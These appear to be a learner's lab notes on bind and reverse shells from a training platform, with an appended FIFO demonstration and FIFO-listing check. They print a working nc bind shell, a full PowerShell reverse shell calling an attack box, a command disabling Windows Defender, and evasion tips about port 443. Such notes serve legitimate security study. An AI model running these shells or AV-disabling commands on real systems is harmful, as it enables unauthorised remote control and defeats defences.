1. Shell Validation
1) ps
yeon0815@htb[/htb]$ ps
PID TTY TIME CMD
4232 pts/1 00:00:00 bash
11435 pts/1 00:00:00 ps
2) env
yeon0815@htb[/htb]$ env
SHELL=/bin/bash
2. Bind Shell
- The target system has a listener started and awaits a connection from a pentester's system.
- Admins typically configure strict incoming firewall rules and NAT on the edge of the network (public-facing), so we would need to be on the internal network already.
- OS firewalls will likely block most incoming connections that aren't associated with trusted network-based applications.
1) Server - Binding a bash shell to the TCP session
- The code in our payloads will differ depending on the host operating system we are delivering it to.
Target@server:~$ rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
2) Client - Connecting to bind shell on target
yeon0815@htb[/htb]$ nc -nv 10.129.41.200 7777
Target@server:~$
3. Reverse Shells
- The attack box will have a listener running, and the target will need to initiate the connection.
- It is likely that an admin will overlook outbound connections, giving us a better chance of going undetected.
1) Windows target
(1) Server (attack box)
yeon0815@htb[/htb]$ sudo nc -lvnp 443
Listening on 0.0.0.0 443
- We may want to use common ports like this because when we initiate the connection to our listener, we want to ensure it does not get blocked going outbound through the OS firewall and at the network level.
- It would be rare to see any security team blocking 443 outbound since many applications and organizations rely on HTTPS to get to various websites throughout the workday.
(2) Client (target)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
(3) AV
At line:1 char:1
+ $client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
- The AV (Windows Defender Antivirus) software stopped the execution of the code.
(4) Disable AV
PS C:\Users\htb-student> Set-MpPreference -DisableRealtimeMonitoring $true
4. Introduction to Payloads
* FIFO named pipe file: a tool for IPC (inter-process communication) in Linux environments, offering a straightforward way to transfer data between processes without relying on more complex mechanisms like sockets or shared memory.
- e.g., mkfifo /tmp/f;
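Added example (not part of the HTB notes): a FIFO round trip between two unrelated processes, which is the IPC primitive the `mkfifo /tmp/f; cat /tmp/f | ...` construction in section 2 relies on, plus a defender-side inventory of FIFO nodes left in a directory. The temporary path and the sample line are constructed.

```shell
#!/bin/sh
# Added example, not from the HTB notes: shows how a FIFO created with mkfifo
# hands bytes from one process to another. Paths and data are constructed.

# Pass one line from a writer process to an unrelated reader process via a FIFO.
fifo_roundtrip() {
    fifo=$(mktemp -u)            # constructed path; mkfifo creates the node itself
    mkfifo "$fifo" || return 1

    # mkfifo creates a special file of type "p" (test -p), not a regular file:
    # bytes written to it never touch the disk, the kernel buffers them in memory.
    [ -p "$fifo" ] || return 1

    # Writer: opening a FIFO for writing blocks until a reader opens it (and vice
    # versa), so the writer must run in a separate process (a background subshell).
    ( printf 'hello via fifo\n' > "$fifo" ) &
    writer=$!

    # Reader: consumes the line; both open() calls complete once both ends exist.
    read -r line < "$fifo"

    wait "$writer"
    rm -f "$fifo"                # the node persists until removed; the command in
                                 # section 2 only removes a stale /tmp/f beforehand
    printf '%s\n' "$line"
}

# Defender's inventory: FIFO nodes in a directory such as /tmp are rare in normal
# operation, so listing them is a cheap check for leftovers of the pattern above.
list_fifos() {
    find "$1" -maxdepth 1 -type p 2>/dev/null
}
```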